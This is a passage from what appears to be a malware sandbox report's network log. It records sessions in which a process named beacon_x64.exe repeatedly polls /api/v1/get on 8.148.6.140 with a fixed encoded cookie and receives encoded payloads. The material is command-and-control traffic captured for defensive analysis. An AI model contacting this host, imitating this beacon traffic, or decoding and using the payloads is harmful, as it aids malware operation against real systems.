          Data Ascii: 1tMUoVI0hd0nKF/sqra8UtW0nIU2QTH0rM4sC+Lk3BO1shpF00q/hBYafo3DiGBxzBfkPfrgyJhdOjSMHHAIG7B96KbfGs3sTmA57cz2ZB9HvJIojesHekXQQbtJA1kMgs+HKKo+9uppuQJ53CGNaPezEGuA4ize1vk086wLQiCYDfCUW1cikTNWuefbPywa1gCO6xyNtogcHIOnSoCwyvJm5nH95PEmjatvbBWtn+U=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          41192.168.2.6500278.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:19.124938011 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:20.067663908 CET485INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:19 GMT
          Server: nginx
          Content-Length: 300
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 6b 55 49 48 79 69 67 4e 4c 4d 49 49 41 4b 56 2b 58 5a 50 61 6e 61 44 55 5a 45 75 54 43 67 75 72 6b 4f 6f 50 70 57 45 58 75 75 2f 48 33 33 45 78 72 69 71 77 74 77 2f 55 61 52 36 6a 67 48 4b 35 54 4f 6f 70 2f 42 69 79 31 6d 36 69 43 34 53 57 79 74 62 4b 50 62 2b 52 35 57 6c 2f 55 6d 33 45 77 4e 41 46 78 49 33 37 41 74 53 45 4c 36 37 43 62 4c 2f 64 77 77 56 34 39 67 4d 35 6c 63 72 52 58 44 47 79 39 33 4e 71 6e 44 34 70 53 39 78 63 2f 61 46 41 47 76 79 4f 48 61 41 35 44 79 54 48 4e 42 2f 4d 52 35 4b 41 37 45 4f 75 53 6c 4b 64 2b 4d 34 52 4d 6f 43 6d 51 5a 4c 45 55 73 6b 74 58 38 42 69 4f 46 63 58 79 33 73 64 4c 42 51 41 61 2b 71 35 30 54 53 37 32 67 66 6f 68 4c 4f 54 46 76 46 79 6b 66 4c 39 49 50 59 4a 71 36 4a 6c 52 37 58 44 69 63 6f 54 70 33 49 4b 42 2f 67 4e 43 6b 58 74 6f 51 50 4b 74 75 7a 68 4b 59 37 4f 70 36 73 38 37 44 4a 35 35 4b 4c 6c 6c 73 36 4f 4a 65 64 43 57 78 71 65 68 2b 55 3d
          Data Ascii: kUIHyigNLMIIAKV+XZPanaDUZEuTCgurkOoPpWEXuu/H33Exriqwtw/UaR6jgHK5TOop/Biy1m6iC4SWytbKPb+R5Wl/Um3EwNAFxI37AtSEL67CbL/dwwV49gM5lcrRXDGy93NqnD4pS9xc/aFAGvyOHaA5DyTHNB/MR5KA7EOuSlKd+M4RMoCmQZLEUsktX8BiOFcXy3sdLBQAa+q50TS72gfohLOTFvFykfL9IPYJq6JlR7XDicoTp3IKB/gNCkXtoQPKtuzhKY7Op6s87DJ55KLlls6OJedCWxqeh+U=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          42192.168.2.6500288.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:20.236419916 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:21.747904062 CET377INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:21 GMT
          Server: nginx
          Content-Length: 192
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 39 54 70 6c 31 4b 6d 7a 4c 61 4d 45 77 68 6f 50 4d 50 4b 67 6f 7a 75 78 65 42 41 68 4c 46 33 6f 4b 6f 33 6d 78 75 35 77 49 4d 2b 38 33 70 33 53 67 74 64 71 74 2f 78 2f 49 6f 77 64 77 6e 75 63 75 44 71 72 64 34 62 4d 6c 2f 6f 67 53 78 62 41 35 4d 2f 43 6c 43 4f 46 2b 79 69 7a 7a 4a 63 4b 50 61 5a 42 32 33 38 78 67 51 37 75 61 4c 33 6d 4d 2f 76 74 5a 49 41 6d 57 45 69 46 54 70 2b 55 73 58 73 42 78 73 63 47 4d 50 33 63 36 61 31 77 6a 4b 6f 77 32 75 51 56 74 55 39 4a 6c 2f 69 41 50 47 71 62 5a 36 38 39 4a 30 6e 71 6c 73 77 35 39 51 69 6b 5a 51 41 6c 44 57 61 76 41 63 4e 36
          Data Ascii: 9Tpl1KmzLaMEwhoPMPKgozuxeBAhLF3oKo3mxu5wIM+83p3Sgtdqt/x/IowdwnucuDqrd4bMl/ogSxbA5M/ClCOF+yizzJcKPaZB238xgQ7uaL3mM/vtZIAmWEiFTp+UsXsBxscGMP3c6a1wjKow2uQVtU9Jl/iAPGqbZ689J0nqlsw59QikZQAlDWavAcN6


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          43192.168.2.6500298.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:21.874087095 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:22.864389896 CET529INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:22 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 66 2f 48 51 42 6f 34 39 46 4f 53 51 72 41 55 73 4c 34 2b 7a 41 62 31 54 4f 76 78 62 5a 66 66 52 43 6d 51 6a 76 37 31 48 61 69 78 38 41 53 32 5a 36 45 76 53 51 39 71 42 55 41 67 57 31 76 77 6f 4e 79 41 41 69 6d 55 46 2f 32 32 51 75 72 49 50 46 4f 43 47 2f 6a 73 67 63 36 56 4d 66 4a 47 50 50 61 6b 6f 75 4a 42 32 71 6a 67 4c 33 4c 4e 54 34 64 5a 65 70 56 72 39 76 51 68 6e 42 69 6d 33 37 68 65 61 74 55 71 54 56 46 58 4f 67 64 51 7a 69 7a 53 53 63 4e 75 6a 57 5a 75 64 77 5a 4b 45 67 59 4c 41 6d 45 64 4c 64 77 6b 6d 34 6f 78 51 6b 63 4a 62 62 74 44 67 67 37 72 49 65 41 6f 36 63 71 6f 48 5a 71 70 71 64 4e 67 56 34 51 78 2b 55 48 76 49 57 70 55 6e 43 68 46 74 52 4e 43 79 44 76 7a 55 6e 74 48 4f 4a 56 37 62 48 32 6a 66 50 68 74 4f 59 4b 41 4f 73 6c 76 50 56 47 6d 4a 4e 38 34 53 61 68 42 53 56 43 79 57 30 48 6c 39 58 33 63 33 2b 62 34 66 70 4d 38 70 34 34 79 54 57 43 48 4f 34 71 6e 4a 6b 2f 73 31 79 51 31 45 65 54 39 67 4e 44 4b 6f 4b 52 68 54 43 71 70 44 54 55 70 61 31 71 48 63 54 70 5a 44 30 43 64 78 48 2b [TRUNCATED]
          Data Ascii: f/HQBo49FOSQrAUsL4+zAb1TOvxbZffRCmQjv71Haix8AS2Z6EvSQ9qBUAgW1vwoNyAAimUF/22QurIPFOCG/jsgc6VMfJGPPakouJB2qjgL3LNT4dZepVr9vQhnBim37heatUqTVFXOgdQzizSScNujWZudwZKEgYLAmEdLdwkm4oxQkcJbbtDgg7rIeAo6cqoHZqpqdNgV4Qx+UHvIWpUnChFtRNCyDvzUntHOJV7bH2jfPhtOYKAOslvPVGmJN84SahBSVCyW0Hl9X3c3+b4fpM8p44yTWCHO4qnJk/s1yQ1EeT9gNDKoKRhTCqpDTUpa1qHcTpZD0CdxH+xV+w==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          44192.168.2.6500308.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:23.079349995 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          45192.168.2.6500318.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:24.125369072 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:25.111063004 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:24 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 78 71 36 69 67 36 50 6c 70 6c 2f 6c 61 48 73 45 6f 58 59 42 47 64 68 43 31 43 61 47 34 42 76 69 42 33 47 30 34 68 4c 2b 6b 42 6d 4c 46 31 4a 72 62 79 61 30 75 56 6a 4a 6e 36 72 49 74 35 46 70 6c 31 69 6f 55 46 2f 35 75 78 46 55 32 52 51 47 58 72 4a 67 50 49 79 79 6d 6a 70 39 49 37 79 2b 39 46 51 6f 33 67 38 74 4a 64 66 62 73 71 6e 75 4d 57 38 69 38 42 7a 63 46 4d 64 66 70 4d 7a 54 61 39 64 50 72 76 35 66 67 30 72 4e 69 35 36 54 57 48 6b 38 46 4a 4b 58 73 58 4e 42 52 4a 4e 6d 50 57 64 42 51 73 52 2f 7a 50 32 48 77 66 38 61 69 73 4f 31 57 77 4d 38 59 75 33 31 68 31 68 77 39 4d 6d 77 32 78 64 6b 33 45 6f 35 34 31 38 6f 38 44 32 34 6e 75 30 39 42 4b 50 35 41 30 48 44 31 53 46 64 6c 49 66 68 6e 7a 34 53 41 46 70 54 4e 31 75 4c 58 75 4d 41 6e 37 49 50 76 64 65 71 4b 38 69 72 54 71 44 4f 52 77 73 66 35 7a 57 55 4f 6b 56 50 30 51 53 6f 75 67 76 4a 6a 33 59 73 7a 7a 4d 31 51 73 4f 41 32 4d 6c 34 48 76 30 48 62 59 6e 42 4b 58 59 72 50 63 69 66 6f 73 57 47
          Data Ascii: xq6ig6Plpl/laHsEoXYBGdhC1CaG4BviB3G04hL+kBmLF1Jrbya0uVjJn6rIt5Fpl1ioUF/5uxFU2RQGXrJgPIyymjp9I7y+9FQo3g8tJdfbsqnuMW8i8BzcFMdfpMzTa9dPrv5fg0rNi56TWHk8FJKXsXNBRJNmPWdBQsR/zP2Hwf8aisO1WwM8Yu31h1hw9Mmw2xdk3Eo5418o8D24nu09BKP5A0HD1SFdlIfhnz4SAFpTN1uLXuMAn7IPvdeqK8irTqDORwsf5zWUOkVP0QSougvJj3YszzM1QsOA2Ml4Hv0HbYnBKXYrPcifosWG


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          46192.168.2.6500328.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:25.237972021 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:27.564515114 CET549INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:27 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 2f 77 65 46 30 73 30 46 6e 55 56 39 43 62 68 69 7a 5a 52 42 36 66 31 53 66 52 6e 65 59 79 4e 6e 35 6e 61 4a 78 71 4a 33 69 2f 78 55 76 42 63 48 6d 74 49 50 79 4a 37 4c 78 4d 45 72 53 6c 41 70 56 31 47 7a 63 39 69 45 50 45 62 4b 61 58 41 5a 42 74 2f 78 79 62 4a 74 5a 47 62 5a 2b 76 53 2f 62 6c 55 62 44 65 54 43 48 74 41 65 47 5a 45 59 2b 41 42 59 6e 33 5a 78 39 4c 44 45 56 54 45 65 77 74 48 63 76 75 41 69 68 34 43 67 66 37 45 2f 6f 4c 6b 6a 7a 39 56 38 69 38 69 72 4e 2f 71 78 4b 6f 6d 67 66 6b 61 56 41 78 72 50 33 57 4d 49 75 4f 34 4a 78 37 4f 69 66 43 36 75 2f 4e 41 69 46 47 63 51 79 36 56 53 51 65 51 43 2f 42 32 79 43 43 75 6d 78 53 6b 6c 74 4c 74 41 76 2f 30 33 53 50 42 76 68 47 45 65 69 53 4d 33 4f 42 4b 51 61 6b 65 63 4e 56 58 65 67 2f 63 74 56 36 42 76 46 6e 4c 41 6e 7a 79 77 46 68 4f 50 63 39 4d 6e 30 6c 58 39 2b 78 78 64 4d 6f 33 34 74 71 54 69 73 45 4c 4e 41 78 4b 53 6e 37 6b 4a 6f 46 61 73 6d 36 32 30 34 5a 50 50 47 33 77 62 55 4f 70 35 4c 31 44 30 4d 77 79 44 58 45 5a 6d 45 46 48 77 30 47 [TRUNCATED]
          Data Ascii: /weF0s0FnUV9CbhizZRB6f1SfRneYyNn5naJxqJ3i/xUvBcHmtIPyJ7LxMErSlApV1Gzc9iEPEbKaXAZBt/xybJtZGbZ+vS/blUbDeTCHtAeGZEY+ABYn3Zx9LDEVTEewtHcvuAih4Cgf7E/oLkjz9V8i8irN/qxKomgfkaVAxrP3WMIuO4Jx7OifC6u/NAiFGcQy6VSQeQC/B2yCCumxSkltLtAv/03SPBvhGEeiSM3OBKQakecNVXeg/ctV6BvFnLAnzywFhOPc9Mn0lX9+xxdMo34tqTisELNAxKSn7kJoFasm6204ZPPG3wbUOp5L1D0MwyDXEZmEFHw0G21CU54YBmynuMdnLxqfB6wsl0=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          47192.168.2.6500338.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:27.688795090 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:31.650252104 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:31 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 31 75 6f 39 41 6c 45 71 62 65 32 46 38 61 6f 30 6c 76 52 47 77 4f 51 6e 30 79 2f 63 33 49 46 77 49 33 57 39 77 58 2b 63 39 50 33 39 67 4c 45 34 6e 6b 68 2b 77 64 4b 53 2f 30 31 63 67 4a 59 56 48 35 59 68 6a 52 78 4a 62 62 7a 2b 38 73 53 67 61 42 77 39 76 6d 51 66 57 6f 2f 57 65 45 35 71 2f 79 48 77 47 57 35 4b 34 63 34 6e 6c 75 4c 36 31 4a 70 5a 45 6e 2f 76 35 45 58 6c 7a 55 52 56 6d 72 71 2b 78 47 6e 75 79 32 65 55 4e 77 38 63 72 2f 44 4f 46 52 5a 78 43 54 74 46 55 74 39 51 42 36 62 77 6d 78 62 6d 6b 74 45 70 2b 4d 30 2f 51 50 5a 76 62 63 74 51 67 33 54 70 4f 47 6e 32 6b 59 42 45 72 76 72 72 52 35 76 30 4f 37 47 76 65 7a 39 47 34 61 2b 4e 57 49 73 6d 71 64 6f 53 4c 45 5a 43 67 70 73 71 49 74 47 63 6f 30 64 48 74 4b 4f 6b 53 48 33 30 51 4e 4a 35 37 55 64 33 74 52 2f 4a 6d 76 72 45 68 36 34 4b 71 45 6c 73 62 4e 6b 4c 74 50 52 54 4c 64 5a 47 31 41 7a 64 35 45 6d 5a 73 59 4c 74 6b 33 42 72 5a 59 5a 64 32 6c 35 36 5a 79 70 62 37 79 37 4e 34 5a 41 67
          Data Ascii: 1uo9AlEqbe2F8ao0lvRGwOQn0y/c3IFwI3W9wX+c9P39gLE4nkh+wdKS/01cgJYVH5YhjRxJbbz+8sSgaBw9vmQfWo/WeE5q/yHwGW5K4c4nluL61JpZEn/v5EXlzURVmrq+xGnuy2eUNw8cr/DOFRZxCTtFUt9QB6bwmxbmktEp+M0/QPZvbctQg3TpOGn2kYBErvrrR5v0O7Gvez9G4a+NWIsmqdoSLEZCgpsqItGco0dHtKOkSH30QNJ57Ud3tR/JmvrEh64KqElsbNkLtPRTLdZG1Azd5EmZsYLtk3BrZYZd2l56Zypb7y7N4ZAg


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          48192.168.2.6500358.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:31.788022995 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:33.370791912 CET337INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:33 GMT
          Server: nginx
          Content-Length: 152
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 48 48 48 47 4f 4a 4b 77 55 65 6b 54 77 74 49 6b 48 53 50 39 77 77 6e 64 34 78 33 65 31 70 67 70 6e 46 49 69 70 54 55 51 59 49 2b 77 6e 52 55 62 66 75 4a 63 58 6d 50 37 49 72 75 49 61 49 4f 41 44 71 67 70 39 30 7a 58 36 70 66 30 52 53 6d 37 52 69 4f 6d 31 39 54 68 66 45 56 41 4c 2f 32 5a 77 65 31 72 57 57 32 2b 70 4f 7a 52 41 67 55 67 6f 31 4e 59 51 71 63 31 33 68 53 70 74 48 2f 4b 77 4a 6b 65 6c 59 5a 57 63 45 54 55 65 34 47 58 62 61 51 61 30 41 3d 3d
          Data Ascii: HHHGOJKwUekTwtIkHSP9wwnd4x3e1pgpnFIipTUQYI+wnRUbfuJcXmP7IruIaIOADqgp90zX6pf0RSm7RiOm19ThfEVAL/2Zwe1rWW2+pOzRAgUgo1NYQqc13hSptH/KwJkelYZWcETUe4GXbaQa0A==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          49192.168.2.6500368.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:33.522105932 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:34.485897064 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:34 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 61 41 79 34 41 4f 51 76 4c 55 73 6c 39 4f 6c 37 33 6b 76 47 50 6b 73 6f 31 68 54 30 37 61 4f 4d 46 56 68 76 46 63 2b 43 36 38 41 78 44 63 5a 6d 73 55 65 74 69 71 36 69 57 4b 49 44 70 65 7a 69 78 52 47 30 73 39 49 62 56 67 73 4e 41 71 4f 32 30 62 68 79 50 30 32 57 44 75 6e 56 39 67 5a 4b 4c 4e 45 46 63 66 6a 4a 79 4b 51 44 59 45 7a 56 30 72 2f 68 57 65 62 44 52 31 77 62 59 4f 32 46 67 2f 4c 59 71 47 37 73 67 47 79 69 30 6b 66 4f 56 72 4a 49 48 62 37 53 58 6d 73 67 6f 58 62 58 51 6c 74 49 75 4f 44 34 2b 78 37 6f 54 31 53 36 73 4b 75 53 41 30 6c 7a 52 33 71 58 54 55 31 31 61 33 64 4d 55 39 62 31 4f 6b 31 7a 61 77 4e 30 71 77 76 64 6d 50 37 47 4c 76 70 7a 63 7a 63 47 47 6c 4e 71 68 6a 53 68 32 48 30 66 72 76 69 4f 4f 39 32 58 4a 36 31 51 78 75 68 54 38 79 65 79 33 6f 2f 31 35 75 62 77 5a 66 66 49 54 52 76 73 6b 68 51 6a 50 44 55 2f 4a 32 35 34 41 6b 75 4b 4c 62 38 35 38 34 62 61 51 6f 48 33 51 58 35 31 33 39 51 78 4b 44 2f 34 43 2f 52 75 68 54 6f 33
          Data Ascii: aAy4AOQvLUsl9Ol73kvGPkso1hT07aOMFVhvFc+C68AxDcZmsUetiq6iWKIDpezixRG0s9IbVgsNAqO20bhyP02WDunV9gZKLNEFcfjJyKQDYEzV0r/hWebDR1wbYO2Fg/LYqG7sgGyi0kfOVrJIHb7SXmsgoXbXQltIuOD4+x7oT1S6sKuSA0lzR3qXTU11a3dMU9b1Ok1zawN0qwvdmP7GLvpzczcGGlNqhjSh2H0frviOO92XJ61QxuhT8yey3o/15ubwZffITRvskhQjPDU/J254AkuKLb8584baQoH3QX5139QxKD/4C/RuhTo3


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          50192.168.2.6500378.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:34.609361887 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:38.553550959 CET465INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:38 GMT
          Server: nginx
          Content-Length: 280
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 38 4d 46 47 48 6f 43 44 70 58 4d 75 48 46 6e 4b 31 51 34 66 5a 4e 49 6c 49 37 63 61 55 33 55 71 5a 35 6d 35 6f 66 55 50 52 65 30 67 34 6c 79 57 72 43 36 72 65 35 36 6a 68 56 56 6c 54 51 41 31 71 68 38 4b 68 41 34 71 65 6e 38 6a 47 4c 51 37 68 66 43 7a 2f 6f 67 6a 57 62 35 53 66 79 55 78 38 42 43 55 55 41 7a 6f 58 59 61 38 36 44 69 44 51 68 52 4d 34 39 33 36 2f 33 7a 62 70 48 69 76 4c 39 58 6c 65 52 4c 65 63 4a 32 50 64 7a 4c 4f 63 36 49 73 33 75 56 34 4a 4b 73 47 6b 46 57 65 71 42 46 37 56 72 75 52 53 71 46 47 2f 54 64 4c 76 62 4b 48 2f 7a 69 37 62 6e 50 55 4d 66 76 77 67 6a 34 66 6a 35 7a 73 69 33 64 34 49 7a 4a 46 32 66 57 34 59 6d 4c 68 79 6f 67 38 34 4c 79 71 52 43 7a 78 59 4c 47 44 70 4f 6a 6c 70 4f 78 71 4e 6d 72 78 57 72 6f 71 69 32 51 50 6d 76 78 54 2f 49 66 2b 47 39 31 30 49 44 76 42 38 59 41 5a 32 4d 6f 2f 47 41 3d 3d
          Data Ascii: 8MFGHoCDpXMuHFnK1Q4fZNIlI7caU3UqZ5m5ofUPRe0g4lyWrC6re56jhVVlTQA1qh8KhA4qen8jGLQ7hfCz/ogjWb5SfyUx8BCUUAzoXYa86DiDQhRM4936/3zbpHivL9XleRLecJ2PdzLOc6Is3uV4JKsGkFWeqBF7VruRSqFG/TdLvbKH/zi7bnPUMfvwgj4fj5zsi3d4IzJF2fW4YmLhyog84LyqRCzxYLGDpOjlpOxqNmrxWroqi2QPmvxT/If+G910IDvB8YAZ2Mo/GA==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
